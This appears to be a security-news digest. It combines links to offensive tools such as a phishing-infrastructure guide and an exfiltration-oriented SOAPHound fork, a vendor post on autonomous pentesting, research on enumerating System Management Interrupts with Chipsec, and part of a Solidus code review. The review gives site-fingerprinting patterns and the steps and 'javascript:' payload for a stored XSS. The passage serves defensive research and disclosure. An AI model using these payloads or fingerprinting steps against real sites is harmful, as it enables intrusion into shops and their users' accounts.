  • How Malware Can Bypass Transparency Consent and Control (CVE-2023-40424) - CVE-2023-40424 is a vulnerability that allows a root-level user to create a new user with a custom Transparency Consent and Control (TCC) database in macOS, which can then be used to access other users' private data. It was fixed in 2023 in macOS Sonoma (but not backported to older versions!).
  • PsMapExec - A PowerShell tool that takes strong inspiration from CrackMapExec / NetExec.
  • Evilginx-Phishing-Infra-Setup - Evilginx Phishing Engagement Infrastructure Setup Guide.
  • File-Tunnel - Tunnel TCP connections through a file.
  • awesome-cicd-attacks - Practical resources for offensive CI/CD security research. Curated the best resources I've seen since 2021.
  • JA4+ Database - Download, read, learn about, and contribute to augment your organization's JA4+ network security efforts.
  • detection-rules - The home for rules used by Elastic Security. This repository is used for the development, maintenance, testing, validation, and release of rules for Elastic Security's Detection Engine.
  • openrecall - OpenRecall is a fully open-source, privacy-first alternative to proprietary solutions like Microsoft's Windows Recall. With OpenRecall, you can easily access your digital history, enhancing your memory and productivity without compromising your privacy.
  • knock - Knock Subdomain Scan.
  • ubiquity-toolkit - A collection of statically-linked tools targeted to run on almost any linux system.
  • SOAPHound - A fork of SOAPHound that uses an external server to exfiltrate the results vs dropping them on disk for improved OPSEC.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.


The Critical Role of Autonomous Penetration Testing in Strengthening Defense in Depth

10 June 2024 at 19:21

A Modern Approach to Comprehensive Cybersecurity

Defense in Depth (DID) is crucial in cybersecurity because it employs multiple layers of security controls and measures to protect information systems and data. This multi-layered approach helps ensure that if one defensive layer is breached, others continue to provide protection, significantly reducing the likelihood of a successful cyber-attack. By combining physical security, network security, endpoint protection, application security, data security, identity and access management, security policies, monitoring, backup and recovery, and redundancy, organizations can create a robust and resilient security posture that is adaptable to evolving threats. This comprehensive strategy is essential for safeguarding sensitive information, maintaining operational integrity, and complying with regulatory requirements.

However, DID is not a panacea. While it greatly enhances an organization’s security, it cannot guarantee absolute protection. The complexity and layered nature of DID can lead to challenges in management, maintenance, and coordination among different security measures. Additionally, sophisticated attackers continuously develop new methods to bypass multiple layers of defense, such as exploiting zero-day vulnerabilities or using social engineering techniques to gain access and exploit an environment. This highlights the importance of complementing DID with other strategies, such as regular security assessments, autonomous penetration testing, continuous monitoring, and fostering a security-aware culture within an organization. These additional measures help to identify and address emerging threats promptly, ensuring a more dynamic and proactive security approach.

Mission:

JTI Cybersecurity helps organizations around the world improve their security posture and address cybersecurity challenges. They work with small businesses, enterprises, and governments whose customers demand the highest levels of trust, security, and assurance in the protection of their sensitive data and mission-critical operations. JTI provides prudent advice and solutions when following best practices isn’t enough to protect the interests of their clients and the customers they serve.

  • Year Founded: 2020
  • Number of Employees: 5-10
  • Operational Reach: Global

Threat Intelligence

In November 2023, the prolific ransomware group LockBit confirmed a cyberattack on Boeing that impacted its parts and distribution business, as well as part of its global services division. The incident occurred following claims from LockBit that they had breached Boeing’s network and stolen sensitive data. Although Boeing confirmed that flight safety was not compromised, the LockBit group initially threatened to leak and expose the stolen sensitive data if Boeing did not negotiate. This incident not only underscores the persistent threats faced by major corporations but also highlights the importance of implementing robust cybersecurity measures.

Is the concept of DID dead?

In a recent interview with Jon Isaacson, Principal Consultant at JTI Cybersecurity, he highlights that, “some marketing material goes as boldly as saying DID doesn’t work anymore.” However, Jon goes on to say that “DID is still a good strategy, and generally when it fails, it’s not because a layer of the onion failed…it’s because the term is overused, and the organization probably didn’t have any depth at all.” While this is a concept that’s been around for quite some time, its importance hasn’t diminished. In fact, as cyber threats evolve and become increasingly sophisticated, the need for a layered approach to security remains critical.

However, it’s also true that the term can sometimes be overused or misapplied, leading to a perception of it being outdated or ineffective. This can happen if organizations simply pay lip service to the idea of defense in depth without implementing meaningful measures at each layer or if they rely too heavily on traditional approaches without adapting to new threats and technologies.

In today’s rapidly changing threat landscape, organizations need to continually reassess and update their security strategies to ensure they’re effectively mitigating risks. This might involve integrating emerging technologies like autonomous pentesting, adopting a zero-trust security model, or implementing robust incident response capabilities alongside traditional defense in depth measures. While defense in depth may be considered a fundamental principle, its implementation and effectiveness depend on how well it’s adapted to meet the challenges of modern cybersecurity threats.

“While DID definitely helps shore up your defenses, without taking an attacker’s perspective by considering actual attack vectors that they can use to get in, you really can’t be ready.”

DID and the attacker’s perspective

In general, implementing a DID approach to an organization’s security posture helps slow down potential attacks and often challenges threat actors from easily exploiting an environment. Additionally, this forces attackers to use various tactics, techniques, and procedures (TTPs) to overcome DID strategies, and maneuver across layers to find weak points and exploit the path of least resistance. An attacker’s ability to adapt quickly, stay agile, and persist creates challenges for security teams attempting to stay ahead of threats and keep their cyber landscape secure.

As Jon explains, an “adversary is not going to be sitting where Tenable Security Center (for example) is installed with the credentials they have poking through the registry…that’s not how the adversary works…many organizations try to drive their vulnerability management programs in a compliance fashion, ticking off the boxes, doing their required scans, and remediating to a certain level…but that doesn’t tell you anything from an adversary’s perspective.” One of the only ways to see things from an attacker’s perspective is to attack your environment as an adversary would.

Enter NodeZero

Before discovering NodeZero, Jon was working through the best way to build his company, while offering multiple services to his clients. He mentions that “when JTI first started, it was just him, bouncing back and forth between pentesting and doing a SOC2 engagement…early on, there weren’t a massive amount of pentests that had to be done and most were not huge…so doing a lot manually wasn’t a big deal.” However, with his business booming, Jon got to a point where doing a pentest 100% manually was just no longer a thing and he required a solution that was cost effective and that he could run continuously to scale his capabilities for his customers.

Additionally, Jon toyed with the idea of building custom scripts and having a solution automate them so at least some of the work was done for him, weighing his options between semi-automated or buying a solution. Jon first learned of Horizon3.ai through one of his customers, who was also exploring the use of an autonomous pentesting solution. So, after poking around a few competitors of Horizon3.ai that didn’t yield the results he was hoping for, he booked a trial.

NodeZero doesn’t miss anything

At the time, Jon was skeptical that any platform could outperform manual pentesting while supporting his need for logs and reporting. But, as he explains, “there was nothing that [NodeZero] really missed [compared to his previous manual pentests] and there were cases where [NodeZero] would find something that was not found through manual testing.”

After initial trial testing, Jon dove headfirst when he was onboarded with Horizon3.ai and started using NodeZero for many of his pentesting engagements. Looking through the eyes of an attacker, “we can drop NodeZero into an environment and let it do its thing…NodeZero not only enumerates the entire attack surface, but also finds vulnerabilities and attempts to exploit them as an attacker would.” This enables Jon to provide more value to his clients by digging into results to determine actual business impacts, provide specific recommendations for mitigations or remediations, and verify those fixes worked. “[End users] can get a lot of value out of NodeZero even if they aren’t a security expert or pentester because you really can just click it, send it, and forget it…the best bang for their buck is the laundry list of things they [end users] can do to secure their environment every time they run it [NodeZero].”

“NodeZero is a really great tool for both consultants and pentesters…because for us pentesters, we can use it [NodeZero] kind of like the grunts or infantry of the military…just send it in to go blow everything up and then we [pentesters] can be a scalpel, and really dig into and spend time on the areas where things are potentially bad.”

So what?

DID is not dead and is a critical concept in cybersecurity, leveraging multiple layers of security controls to protect information systems and data. By integrating various security measures, organizations create a robust and resilient security posture. This layered approach ensures that if one defense layer is breached, others continue to provide protection, significantly reducing the likelihood of a successful cyber-attack.

However, DID is not a cure-all; it has its limitations. The complexity and layered nature can pose challenges in management and maintenance, and sophisticated attackers may still find ways to bypass defenses using advanced techniques like zero-day exploits or social engineering. Therefore, it’s essential to complement DID with autonomous penetration testing, continuous monitoring, and fostering a security-aware culture to address emerging threats proactively and dynamically.

The post The Critical Role of Autonomous Penetration Testing in Strengthening Defense in Depth appeared first on Horizon3.ai.

Unlocking data privacy: Insights from the data diva | Guest Debbie Reynolds

By: Infosec
10 June 2024 at 18:00

Today on Cyber Work, I’m very excited to welcome Debbie Reynolds, the Data Diva herself, to discuss data privacy. Reynolds developed a love of learning about data privacy while working in library science, and she carried it through to legal technologies. She now runs her own data privacy consultancy and hosts the long-running podcast “The Data Diva Talks Privacy Podcast.” We talk about data privacy in all its complex, nerdy, and sometimes frustrating permutations, how GDPR helped bring Reynolds to even greater attention, how AI has added even more layers of complexity, and some great advice for listeners ready to dip their toes into the waters of a data privacy practitioner career.

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Data privacy
3:29 - First, getting into computers
7:46 - Inspired by GDPR
9:00 - Pivoting to a new cybersecurity career
12:01 - Learning different privacy regulation structures
15:17 - Process of building data systems 
17:41 - Worst current data privacy issue
20:57 - The best in AI and data privacy
22:15 - The Data Diva Podcast
25:24 - The role of data privacy officer
30:36 - Cybersecurity consulting
36:21 - Positives and negatives of data security careers
39:34 - Reynolds' typical day
41:11 - How to get hired in data privacy
48:38 - The best piece of cybersecurity career advice
50:25 - Learn more about the Data Diva
51:14 - Outro

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

Enumerating System Management Interrupts

10 June 2024 at 16:00

System Management Interrupts (SMI) provide a mechanism for entering System Management Mode (SMM) which primarily implements platform-specific functions related to power management. SMM is a privileged execution mode with access to the complete physical memory of the system, and to which the operating system has no visibility. This makes the code running in SMM an ideal target for malware insertion and potential supply chain attacks. Accordingly, it would be interesting to develop a mechanism to audit the SMIs present on a running system with the objective of cross-referencing this information with data provided by the BIOS supplier. This could help ensure that no new firmware entry-points have been added in the system, particularly in situations where there is either no signature verification for the BIOS, or where such verification can be bypassed by the attacker.

Section 32.2, “System Management Interrupt (SMI)”, of Intel’s System Programming Guide [1] states the following regarding the mechanisms to enter SMM and its assigned system priority:

“The only way to enter SMM is by signaling an SMI through the SMI# pin on the processor or through an SMI message received through the APIC bus. The SMI is a nonmaskable external interrupt that operates independently from the processor’s interrupt- and exception-handling mechanism and the local APIC. The SMI takes precedence over an NMI and a maskable interrupt. SMM is non-reentrant; that is, the SMI is disabled while the processor is in SMM.”

Many mainboard chipsets (PCH), such as the Intel 500 series chipset family [2], expose the I/O addresses B2h and B3h, enabling the signaling of the SMI# pin on the processor. Writing a byte value to the address B2h signals the SMI code that corresponds to the written value. The address B3h is used for passing information between the processor and the SMM and needs to be written before the SMI is signaled.

Chipsec [3] is the industry standard tool for auditing the security of x86 platform firmware. It is open source and maintained by Intel. Chipsec includes a module called smm_ptr, which searches for SMI handlers that result in the modification of an allocated memory buffer. It operates by filling the allocated memory with an initial value that is checked after every SMI call. It then iterates through all specified SMI codes, looking for changes in the buffer, the address of which is passed to the SMI via the processor’s general-purpose registers (GPRs).

Although highly useful as a reference approach to trigger SMIs by software, Chipsec’s smm_ptr module does not fulfill the objective of enumerating them. Only when the SMI produces an observable change in the passed memory buffer does the module consider it vulnerable and flag its existence.

Since our goal is to enumerate SMIs, I considered measuring the time it takes for the SMI to execute as a simple measure of the complexity of its handler. The hypothesis is that an SMI code ignored by the BIOS would result in a shorter execution time compared to when the SMI is properly attended. With this objective in mind, I added the ‘scan’ mode to the smm_ptr module [4].

The scan mode introduces a new ioctl command to Chipsec’s kernel module that triggers the SMI and returns the elapsed time to the caller. This mode maintains an average of the time it takes for an SMI to execute and flags any SMI that exceeds a defined margin.

In the initial tests, an unexpected behaviour was observed: with a periodicity of one second, the same SMI code showed a runtime ten times larger than usual. To confirm that these outliers were only present when the SMI was signaled, I implemented an equivalent test in which the SMI call was replaced by a loop taking a similar amount of time. The results of both tests are presented below.
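The averaging-and-flagging idea can be sketched in a few lines of Python. This is only an illustration, not the code added to Chipsec: the class name `SmiTimingScanner`, the one-third margin, the choice to keep flagged samples out of the average, and the sample values are all assumptions made for the example.

```python
from dataclasses import dataclass, field


@dataclass
class SmiTimingScanner:
    """Keeps a running mean of elapsed counts and flags large outliers."""

    margin: float = 1.0 / 3.0  # assumption: flag samples above mean * (1 + margin)
    samples: int = 0
    mean: float = 0.0
    flagged: list = field(default_factory=list)

    def observe(self, smi_code: int, counts: int) -> bool:
        """Record one measurement; return True if it is flagged as long-running."""
        is_long = self.samples > 0 and counts > self.mean * (1.0 + self.margin)
        if is_long:
            self.flagged.append((smi_code, counts))
        else:
            # Assumption: only ordinary samples update the running mean.
            self.samples += 1
            self.mean += (counts - self.mean) / self.samples
        return is_long


# Hypothetical measurements: (SMI code, elapsed CPU counts).
scanner = SmiTimingScanner()
for code, counts in [(0, 770_000), (1, 772_000), (2, 768_000),
                     (3, 3_559_564), (4, 771_000)]:
    scanner.observe(code, counts)

print(scanner.flagged)
```

Keeping flagged samples out of the mean stops a single long run from raising the threshold for the measurements that follow; whether the real module does the same is not stated in the text.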

CPU counts per SMI call
CPU counts per test loop execution

Each long-running SMI is detailed next, where ‘max’ and ‘min’ are the maximum and minimum measured elapsed times in CPU counts, ‘total’ is the number of SMIs signaled, ‘address’ shows the register used for passing the address of the allocated buffer, and ‘data’ is the value written to the I/O address B3h.

SMI: 0, max: 5023124, min: 680534, count: 7, total: 12288,
  long-running SMIs: [
  {'time offset': 278.017 ms, 'counts': 3559564, 'rcx': 11, 'address': rbx, 'data': 0x09},
  {'time offset': 1278.003 ms, 'counts': 3664844, 'rcx': 14, 'address': rbx, 'data': 0x2C},
  {'time offset': 2277.865 ms, 'counts': 4244506, 'rcx': 1, 'address': rbx, 'data': 0x50},
  {'time offset': 3277.685 ms, 'counts': 4950032, 'rcx': 4, 'address': rsi, 'data': 0x73},
  {'time offset': 4277.681 ms, 'counts': 5023124, 'rcx': 8, 'address': rbx, 'data': 0x96},
  {'time offset': 5277.898 ms, 'counts': 4347570, 'rcx': 11, 'address': rbx, 'data': 0xB9},
  {'time offset': 6277.909 ms, 'counts': 4374736, 'rcx': 14, 'address': rsi, 'data': 0xDC}]

I don’t know the reason for these periodic lengthy SMIs. I can only speculate that they might be NMIs being blocked during SMM and serviced with priority right after exiting SMM, before the time is measured. In any case, I opted for performing a confirmation read once a long-running SMI is found, which effectively filters out these long measurements, resulting in the output shown below. It has an average elapsed time of 770239.23 counts and a standard deviation of 7377.06 counts (0.219749 ms and 2.104e-06 seconds respectively on a 3.5 GHz CPU).

CPU counts per SMI with the outliers filtered out
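A confirmation read of this kind might look like the following Python sketch. It is not the Chipsec implementation: `confirm_long_running`, the `measure` callback, the scripted stand-in for the real measurement and the threshold value are all hypothetical.

```python
from typing import Callable, Optional


def confirm_long_running(measure: Callable[[], int], threshold: float) -> Optional[int]:
    """Return elapsed counts only if two consecutive measurements exceed threshold."""
    first = measure()
    if first <= threshold:
        return None       # ordinary SMI, nothing to report
    second = measure()    # confirmation read with the same code and parameters
    if second <= threshold:
        return None       # the long run did not repeat: treat it as a periodic outlier
    return min(first, second)


def scripted(values):
    """Stand-in for the real SMI measurement: replays a fixed list of counts."""
    iterator = iter(values)
    return lambda: next(iterator)


THRESHOLD = 1_000_000  # hypothetical threshold in CPU counts

transient = confirm_long_running(scripted([3_559_564, 770_000]), THRESHOLD)
persistent = confirm_long_running(scripted([3_559_564, 3_600_000]), THRESHOLD)
print(transient, persistent)
```

The second measurement costs one extra SMI per candidate, which is cheap as long as genuinely long-running handlers are rare.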

To discard any effects of the values passed to the SMI, I ran the test by repeatedly signaling the same SMI code and parameters. Below is the result using the confirmation read strategy, showing an average value of 769718.88 counts (0.219600 ms) and standard deviation of 6524.88 counts (1.861e-06 seconds).

CPU counts per SMI with the outliers filtered out and using the same SMI parameters

The proposed scan mode is effective in identifying long-running SMIs present in the system. However, it is unable to find others that fall within the bounds of the defined threshold. For example, using an arbitrary threshold of one third above the average, the implementation failed to notice some of the SMIs flagged by smm_ptr’s fuzz and fuzzmore modes. The main reasons are the large deviation observed and the challenge of dealing with a system for which no confirmed SMI codes are provided, making it difficult to calibrate the algorithm and establish a suitable threshold value.

The implementation has been merged into the upstream version of Chipsec and will be included in the next release [5].

[1] Intel® 64 and IA-32 Architectures Software Developer’s Manual Volume 3 (3A, 3B, 3C, 3D): System Programming Guide
[2] Intel® 500 Series Chipset Family On-Package Platform Controller Hub Datasheet, Volume 1 of 2. Rev. 007, September 2021.
[3] https://chipsec.github.io/
[4] https://github.com/nccgroup/chipsec/commit/eaad11ad587d951d3720c43cbce6d068731b7cdb
[5] https://github.com/chipsec/chipsec/pull/2141

Solidus — Code Review

As Research Engineers at Tenable, we have several periods during the year to work on a subject of our choice, as long as it is of interest to the team. For my part, I chose to carry out a code review of a Ruby on Rails project.

The main objective is to focus on reviewing code, understanding it and the various interactions between components.

I chose Solidus, an open-source eCommerce framework for industry trailblazers. The project originally started as a fork of Spree.

Developed with the Ruby on Rails framework, Solidus consists of several gems. When you require the solidus gem in your Gemfile, Bundler will install all of the following gems:

  • solidus_api (RESTful API)
  • solidus_backend (Admin area)
  • solidus_core (Essential models, mailers, and classes)
  • solidus_sample (Sample data)

All of the gems are designed to work together to provide a fully functional ecommerce platform.

https://www.tenable.com/research

Project selection

Solidus wasn’t my first choice. I originally wanted to select Zammad, a web-based open source helpdesk/customer support system also developed with Ruby on Rails.

The project is quite popular and, after a quick look, has a good attack surface. This type of project is also interesting because, for many businesses, the support/ticketing component is quite critical, so identifying a vulnerability in a project such as Zammad almost guarantees an interesting vulnerability!

For various reasons, whether on my professional or personal laptop, I need to run the project in Docker, which is pretty common today for a web project, but:

Zammad requires many components, such as Elasticsearch, Memcached, PostgreSQL and Redis. Although the project provides a ready-to-use docker-compose file, as soon as I wanted to use it in development mode, the project wouldn’t initialize properly.

Rather than waste too much time, I decided to put it aside for another time (for sure) and choose another project that seemed simpler to get started on.

After a tour of Github, I came across Solidus, which not only offers instructions for setting up a development environment in just a few lines, but also has a few public vulnerabilities.

For us, this is generally a good sign in terms of communication in case of a discovery. This shows that the publisher is open to exchange, which is unfortunately not always the case.

The reality is that I also had a few problems with the Solidus Dockerfile supplied, but by browsing the issues and making some modifications on my own I was able to quickly launch the project.

Project started with bin/dev cmd

Ruby on Rails Architecture & Attack Surface

Like many web frameworks, Ruby on Rails uses an MVC architecture. Although this is not the theme of this blog post, a quick reminder doesn’t hurt to make sure the rest is clear:

  • Model contains the data and the logic around the data (validation, registration, etc.)
  • View displays the result to the user
  • The Controller handles user actions and modifies model and view data. It acts as a link between the model and the view.

Another important point about Ruby on Rails is that the framework follows “Convention over Configuration”: many choices are made for you, so all projects share similarities. This makes it easier to understand a project from an attacker’s point of view if you know how the framework works.

In a Ruby on Rails project, application routing is managed directly by the ‘config/routes.rb’ file. All possible actions are defined in this file!

As explained in the overview chapter, Solidus is composed of a set of gems (Core, Backend & API) designed to work together to provide a fully functional ecommerce platform.

These three components are independent of each other, so when we audit the Github Solidus/Solidus project, we’re actually auditing multiple projects with multiple distinct attack surfaces that are more or less interconnected.

Solidus has three main route files :

  • Admin Namespace SolidusAdmin::Engine
  • Backend Namespace Spree::Core::Engine
  • API Namespace Spree::Core::Engine

Two of the three files are in the same namespace, while Admin is more detached.

A namespace can be seen as a “group” that contains Classes, Constants or other Modules. This allows you to structure your project. Here, it’s important to understand that API and Backend are directly connected, but cannot interact directly with Admin.

If we take a closer look at the file, we can see that routes are defined in several ways. Without going into all the details and subtleties, you can either define your route directly, such as

get '/orders/mine', to: 'orders#mine', as: 'my_orders'

This means that a GET request on “/orders/mine” will be sent to the “mine” method of the “Orders” controller (we don’t care about “as: 'my_orders'” here).

module Spree
  module Api
    class OrdersController < Spree::Api::BaseController
      # [...]
      def mine
        if current_api_user
          @orders = current_api_user.orders.by_store(current_store).reverse_chronological.ransack(params[:q]).result
          @orders = paginate(@orders)
        else
          render "spree/api/errors/unauthorized", status: :unauthorized
        end
      end
      # [...]
    end
  end
end

Or via the CRUD system using something like :

resources :customer_returns, except: :destroy

For the explanations, I’ll go straight to what is explained in the Ruby on Rails documentation :

“In Rails, a resourceful route provides a mapping between HTTP verbs and URLs to controller actions. By convention, each action also maps to a specific CRUD operation in a database.”

So here, the :customer_returns resource will link to the CustomerReturns controller for the following URLs :

  • GET /customer_returns
  • GET /customer_returns/new
  • POST /customer_returns
  • GET /customer_returns/:id
  • GET /customer_returns/:id/edit
  • PATCH/PUT /customer_returns/:id
  • DELETE /customer_returns/:id is not generated, because of “except: :destroy”
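To make the mapping concrete, here is a small Python sketch that expands a `resources` declaration into the conventional Rails routes listed above. It only mimics the convention for illustration; the function name `expand_resources` and its parameters are made up for this example and are not part of Rails or Solidus.

```python
# The seven conventional routes Rails generates for `resources :name`.
RESOURCE_ROUTES = [
    ("index", "GET", "/{name}"),
    ("new", "GET", "/{name}/new"),
    ("create", "POST", "/{name}"),
    ("show", "GET", "/{name}/:id"),
    ("edit", "GET", "/{name}/:id/edit"),
    ("update", "PATCH/PUT", "/{name}/:id"),
    ("destroy", "DELETE", "/{name}/:id"),
]


def expand_resources(name: str, except_actions: tuple = ()) -> list:
    """List (verb, path, 'controller#action') tuples for a resourceful route."""
    return [
        (verb, path.format(name=name), f"{name}#{action}")
        for action, verb, path in RESOURCE_ROUTES
        if action not in except_actions
    ]


# Equivalent of: resources :customer_returns, except: :destroy
routes = expand_resources("customer_returns", except_actions=("destroy",))
for verb, path, target in routes:
    print(f"{verb:<10}{path:<32}{target}")
```

Each `resources` line in a routes file therefore stands for up to seven reachable controller actions, which is why counting those lines gives a quick lower bound on the attack surface.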

So, with this, it’s easy to see that Solidus has a sizable attack surface.

Static Code Analysis

This project also gives me the opportunity to test various static code analysis tools. I don’t expect much from these tools but as I don’t use them regularly, this allows me to see what’s new and what’s been developing.

The advantage of having an open source project on Github is that many static analysis tools can be run through a Github Action, at least… in theory.

Without going through all the tools tested, CodeQL is the only one that I was able to run “out of the box” via a GitHub Action; the results are then directly visible in the Security tab.

Extract of vulnerabilities identified by CodeQL

Processing the results from all the tools takes a lot of time. Many of the results are redundant, and I have also observed that some paid tools are in fact just overlays of open source tools such as Semgrep (the results, and even the wording, being exactly the same).

Special mention to Brakeman, a tool dedicated to the analysis of Ruby on Rails code. It quickly and simply gives you some interesting paths to explore, in a readable manner.

Extract of vulnerabilities identified by Brakeman

Without going over all the findings that I have put aside (paths to explore), some of them are quick to rule out. Take for example the finding “Polynomial regular expression used on uncontrolled data” from CodeQL :

In addition to not seeming exploitable to me, this case is not very interesting because it affects the admin area and therefore requires elevated privileges to be exploited.

Now with this “SQL Injection” example from Brakeman :

As the analysis lacks context, it does not know that in reality “price_table_name” does not correspond to a user input but to the call of a method which returns the name of a table (which is therefore not controllable by a user).

However, these tools remain interesting because they can give a quick overview of areas to dig into.

Identifying a Solidus Website

Before getting into the nitty-gritty of the subject, it may be interesting to identify whether the visited site uses Solidus or not and for that there are several methods.

On the main shop page, it is possible to search for the following patterns :

<p>Powered by <a href="http://solidus.io/">Solidus</a></p>
/assets/spree/frontend/solidus_starter_frontend

Or check if the following JS functions are available :

Solidus()
SolidusPaypalBraintree

Or finally, visit the administration panel accessible at ‘/admin/login’ and look for one of the following patterns :

<img src="/assets/logo/solidus
<script src="/assets/solidus_admin/
solidus_auth_devise replaces this partial

Unfortunately, no technique seems more reliable than the others and these do not make it possible to determine the version of Solidus.
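As a rough illustration, the static HTML patterns above can be checked with plain substring matching. The Python sketch below works on an HTML string that has already been fetched; the helper name `solidus_markers` and the sample page are made up for the example, and the JavaScript checks are left out because they require a browser context.

```python
# Markers quoted in the text above; matching is plain substring search.
SHOP_MARKERS = (
    '<p>Powered by <a href="http://solidus.io/">Solidus</a></p>',
    "/assets/spree/frontend/solidus_starter_frontend",
)
ADMIN_MARKERS = (
    '<img src="/assets/logo/solidus',
    '<script src="/assets/solidus_admin/',
    "solidus_auth_devise replaces this partial",
)


def solidus_markers(html: str, markers: tuple) -> list:
    """Return the markers that appear verbatim in the given HTML."""
    return [marker for marker in markers if marker in html]


# Hypothetical shop page used only to exercise the helper.
sample_shop_page = """
<html><body>
<link rel="stylesheet" href="/assets/spree/frontend/solidus_starter_frontend/base.css">
<footer><p>Powered by <a href="http://solidus.io/">Solidus</a></p></footer>
</body></html>
"""

hits = solidus_markers(sample_shop_page, SHOP_MARKERS)
print(f"{len(hits)} of {len(SHOP_MARKERS)} shop markers found")
```

A site owner can remove or rename any of these strings, so a miss proves nothing and a hit is only a hint.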

Using website as normal user

In order to get closer to the product, I like to spend time using it as a typical user. Given the number of routes available, I thought I’d spend a little time there, but I was soon disappointed to see that, for a typical user, there isn’t much to do outside the purchasing process.

Once the order is placed, user actions are rather limited:

  • See your orders
  • See a specific order (But no PDF or tracking)
  • Update your information (Only email and password)

We will just add that when an order is placed, an email is sent to the user and a new email is sent when the product is shipped.

The administration is also quite limited. Apart from the classic actions of an ecommerce site (management of orders, products, stock, etc.), only a small amount of configuration can be done directly from the panel.

For example, it is not possible to configure SMTP there; this configuration must be done directly in the Rails project config.

Authentication & Session management

Authentication is a crucial aspect of web application security. It ensures that only authorized individuals have access to the application’s features and sensitive data.

Devise is a popular, highly configurable and robust Ruby on Rails gem for user authentication. This gem provides a complete solution for managing authentication, including account creation, login, logout and password reset.

One reason why Devise is considered a robust solution is its ability to support advanced security features such as email validation, two-factor authentication and session management. Additionally, Devise is regularly updated to fix security vulnerabilities and improve its features.

When I set up my Solidus project, it used version 4.9.3 of Devise, the latest version available at the time, so I didn’t spend too much time on this part, which immediately seemed to me to be a dead end.

Authorization & Permissions management

Authorization & permissions management is another critical aspect of web application security. It ensures that users only have access to the features and data that they are permitted to access based on their role or permissions.

By default, Solidus only has two roles defined:

  • SuperUser : The administrator role, which gives access to all functionality
  • DefaultCustomer : The default role assigned during registration, a basic role that simply allows you to make purchases on the site

To manage this component, Solidus uses a gem called CanCanCan. Like Devise, CanCanCan is considered a robust solution due to its ability to support complex authorization scenarios, such as hierarchical roles and dynamic permissions. Additionally, CanCanCan is highly configurable.

Furthermore, CanCanCan is highly tested and reliable, making it a safe choice for critical applications. It also has an active community of developers who can provide assistance and advice if needed.

Some Rabbit Holes

1/ Not very interesting Cross-Site Scripting

Finding vulnerabilities is fun, even more so if they are critical, but many articles do not explain that the search takes a lot of time and that many attempts lead to nothing.

Digging into these vulnerabilities, even knowing that they will lead to nothing, is not always meaningless.

Let’s take this Brakeman detection as an example :

Despite the presence of `:target => "_blank"`, which makes an XSS difficult to exploit (or only via unusual interactions such as a mouse-wheel click), I found it interesting to dig into this part of the code and understand how to achieve this injection, simply because it concerns the administration part.

Here’s how this vulnerability could be exploited :

1/ An administrator must modify the shipping methods to set `javascript:alert(document.domain)` as the tracking URL

2/ A user must place an order

3/ An administrator must validate the order and add a tracking number

4/ The tracking URL will therefore correspond to the payload, which can be triggered via a mouse-wheel click

By default, the only privileged role is the administrator, so the only possible scenario is one administrator trapping another administrator… in other words, far from interesting.

Note : According to Solidus documentation, in a configuration that is not the basic one, it would be possible for a user with fewer privileges to exploit this vulnerability
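The payload works because the tracking URL ends up as a link target and its scheme is `javascript:` rather than `http(s):`. As a generic illustration only (this is not Solidus code, and not a fix that Solidus ships), a scheme allow-list check could be sketched in Python as follows; the function name and the example carrier URL are hypothetical.

```python
from urllib.parse import urlparse

# Assumption for this sketch: only web links are acceptable tracking URLs.
ALLOWED_SCHEMES = {"http", "https"}


def is_safe_link_target(url: str) -> bool:
    """Accept a URL only if its scheme is explicitly allow-listed."""
    scheme = urlparse(url.strip()).scheme.lower()
    return scheme in ALLOWED_SCHEMES


candidates = [
    "https://carrier.example/track?id=:tracking",  # hypothetical carrier URL
    "javascript:alert(document.domain)",           # payload from the steps above
    " JavaScript:alert(1)",                        # case and whitespace variation
]
for candidate in candidates:
    print(repr(candidate), is_safe_link_target(candidate))
```

An allow-list is used rather than a block-list because other schemes such as `data:` can be abused as well; the sketch also rejects relative URLs, which have no scheme.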

Although the impact and exploitation are very low, we have pointed out the weakness to Solidus. Despite several attempts to contact them, we have not received a response.
The vulnerability was published as CVE-2024-4859.

2/ Solidus, State Machine & Race Conditions

On an ecommerce site, I find that testing for race conditions is worthwhile because certain features, such as discount coupons, lend themselves to this kind of test.

But before talking about race conditions, we must understand the concept of a state machine.

A state machine is a behavioral model used in software development to represent the different states that an object or system can be in, as well as the transitions between those states. In the context of a web application, a state machine can be used to model the different states that a user or resource can be in, and the actions that can be performed to transition between those states.

For example, in Solidus, users can place orders. A user can be in one of several states with respect to an order, such as “pending”, “processing”, or “shipped”. The state machine would define these states and the transitions between them, such as “place order” (which transitions from “pending” to “processing”), “cancel order” (which transitions from “processing” back to “pending”), and “ship order” (which transitions from “processing” to “shipped”).
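The example above can be written down as a tiny transition table. The Python sketch below is only an illustration of the concept, using the state and event names from the paragraph; it is not how Solidus implements its state machines, and the class names are made up.

```python
class InvalidTransition(Exception):
    """Raised when an event is not allowed in the current state."""


# (event, current state) -> next state, following the example in the text.
TRANSITIONS = {
    ("place_order", "pending"): "processing",
    ("cancel_order", "processing"): "pending",
    ("ship_order", "processing"): "shipped",
}


class OrderStateMachine:
    def __init__(self) -> None:
        self.state = "pending"

    def fire(self, event: str) -> str:
        """Apply an event, refusing any transition that is not in the table."""
        key = (event, self.state)
        if key not in TRANSITIONS:
            raise InvalidTransition(f"cannot {event} while {self.state}")
        self.state = TRANSITIONS[key]
        return self.state


order = OrderStateMachine()
order.fire("place_order")
order.fire("ship_order")
print(order.state)

try:
    order.fire("cancel_order")  # not allowed once the order is shipped
except InvalidTransition as error:
    print(error)
```

Because every allowed move is listed explicitly, anything not in the table is rejected by default, which is the property that makes such code easier to audit.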

Using a state machine in a web application provides several benefits. First, it helps to ensure that the application is consistent and predictable, since the behavior of the system is clearly defined and enforced. Second, it makes it easier to reason about the application and debug issues, since the state of the system can be easily inspected and understood. Third, it can help to simplify the codebase, since complex logic can be encapsulated within the state machine.

I mention this because the Solidus documentation has a chapter dedicated to it, which I think is quite rare!

Now we can try to see if any race conditions are hidden in the use of a promotion code.

This section of the code being still in Spree (the ancestor of Solidus), I did not immediately get my hands on it, but in the case of a whitebox audit, it is sometimes easier to trace the code from an error in the site.

In this case, by applying the same promo code twice, the site indicates the error “The coupon code has already been applied to this order”

